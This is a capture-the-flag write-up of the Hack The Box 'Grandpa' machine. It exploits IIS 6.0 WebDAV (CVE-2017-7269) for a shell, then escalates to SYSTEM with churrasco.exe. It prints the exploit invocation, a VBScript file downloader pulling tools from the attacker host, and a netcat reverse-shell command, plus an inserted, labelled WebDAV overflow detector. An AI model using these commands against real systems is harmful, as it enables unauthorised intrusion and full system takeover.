Grandpa is an easy Windows box. It is exploited by enumerating the box properly and finding that it runs Microsoft IIS 6.0, which is vulnerable to a well-known bug, CVE-2017-7269 (WebDAV): a buffer overflow in the ScStoragePathFromUrl function of the WebDAV service. Abusing this gave a shell as nt authority\network service, which was then upgraded through token kidnapping with churrasco.exe to obtain a higher-privileged shell.
I started off by running NmapAutomator.
Nmap discovered the following open ports and services:
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
The automated nmap script flagged a very useful exploit with a rating of 10.0: the WebDAV exploit. First, I browsed to the web page to get some more information:
I intercepted the request and saw that Microsoft IIS 6.0 is indeed running. I used this exploit against Microsoft IIS 6.0 to obtain a reverse shell. The following command was executed:
python2.7 microsoft-iis6.py 10.129.101.72 80 10.10.14.147 9001
This provided a shell:
nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.147] from (UNKNOWN) [10.129.101.72] 1036
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
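The request shape behind CVE-2017-7269 is public in the CVE description: a PROPFIND request whose If: header begins with "<http://" and is far longer than any lock-token list a real WebDAV client sends. The following detector is an added example written for this writeup, not code from the original post or from the exploit script used above. It parses raw HTTP requests (as a reverse proxy or WAF would see them) and flags that shape. The 512-byte threshold, the host example.test and the sample requests are all constructed assumptions for the example.

```python
from typing import Dict, List, Optional, Tuple

# Assumed threshold for this example: legitimate WebDAV "If:" headers carry a
# handful of short tagged lock tokens, not hundreds of bytes of path.
IF_HEADER_MAX_LEN = 512


def parse_request(raw: str) -> Optional[Tuple[str, str, Dict[str, str]]]:
    """Split a raw HTTP/1.x request into (method, target, headers).

    Header names are lower-cased. Returns None when the request line is not
    three space-separated tokens ending in an HTTP version, so the caller can
    treat the input as malformed rather than silently passing it.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    method, target, _version = parts
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return method.upper(), target, headers


def classify(raw: str) -> str:
    """Return 'malformed', 'suspicious' or 'ok' for one raw request.

    'suspicious' is the CVE-2017-7269 shape: PROPFIND with an If: header that
    starts with "<http://" and exceeds IF_HEADER_MAX_LEN.
    """
    parsed = parse_request(raw)
    if parsed is None:
        return "malformed"
    method, _target, headers = parsed
    if_header = headers.get("if", "")
    if (method == "PROPFIND"
            and if_header.startswith("<http://")
            and len(if_header) > IF_HEADER_MAX_LEN):
        return "suspicious"
    return "ok"


def scan(requests: List[str]) -> Dict[str, int]:
    """Classify every request and return a count per verdict."""
    counts = {"ok": 0, "suspicious": 0, "malformed": 0}
    for raw in requests:
        counts[classify(raw)] += 1
    return counts


# Constructed sample requests (not captured traffic); host and paths are placeholders.
NORMAL_GET = "GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"

# A normal tagged-list If: header also starts with "<http://", so length,
# not the prefix alone, is what separates it from the overflow shape.
LEGIT_PROPFIND = (
    "PROPFIND /docs/report.txt HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Depth: 0\r\n"
    "If: <http://example.test/docs/report.txt> (<opaquelocktoken:0000-placeholder>)\r\n"
    "\r\n"
)

# Shape only: an If: header padded far past the threshold with filler.
OVERLONG_PROPFIND = (
    "PROPFIND / HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "If: <http://example.test/" + "A" * 600 + ">\r\n"
    "\r\n"
)


if __name__ == "__main__":
    for label, req in (("GET", NORMAL_GET),
                       ("legit PROPFIND", LEGIT_PROPFIND),
                       ("overlong PROPFIND", OVERLONG_PROPFIND)):
        print(f"{label:18s} -> {classify(req)}")
    print(scan([NORMAL_GET, LEGIT_PROPFIND, OVERLONG_PROPFIND, "junk"]))
```

Keying on the method and header length rather than on a specific payload string keeps the rule robust against trivial encoding changes, and the separate "malformed" verdict makes sure unparseable input is surfaced instead of being counted as clean. On a box like this one, the real fix is still to remove WebDAV from IIS 6.0 or retire the server, since Windows Server 2003 receives no patches.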
I mistakenly thought this was a SYSTEM shell but quickly realised I had simply misread it, since I couldn't access the admin's desktop. I checked systeminfo:
C:\WINDOWS\Temp>systeminfo
systeminfo

Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-297-2947634-44968
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 1 Hours, 12 Minutes, 25 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           : x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              INTEL - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 796 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,328 MB
Page File: In Use:         142 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           : Q147222
Network Card(s):           N/A
This shows Windows Server 2003 on an x86 architecture. When googling for this, I came across this very nice GitHub page. Next, you need to find a way to transfer files. On these older systems, certutil and PowerShell are not available, so you need to use something else. I always go for VBScript, which is really easy to set up. Copy and paste the following on the machine:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Now you can run the following command to download files from your host:
cscript /nologo wget.vbs http://10.10.14.147/churrasco.exe churrasco.exe
I also transferred netcat over the same way:
cscript /nologo wget.vbs http://10.10.14.147/nc32.exe nc32.exe
Finally, to make use of this executable, run the following command; churrasco runs the supplied command as SYSTEM:
churrasco.exe -d "C:\WINDOWS\Temp\nc32.exe -e cmd.exe 10.10.14.147 4444"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 680
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 476
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 688
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 700
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
The command completed successfully.
If you have set up a listener, this will provide you with a SYSTEM shell.
This was a very simple box but useful nonetheless. I learned about the churrasco executable and really like it, so I will definitely use it on future boxes too since it's really easy to use. Hope you enjoyed this writeup!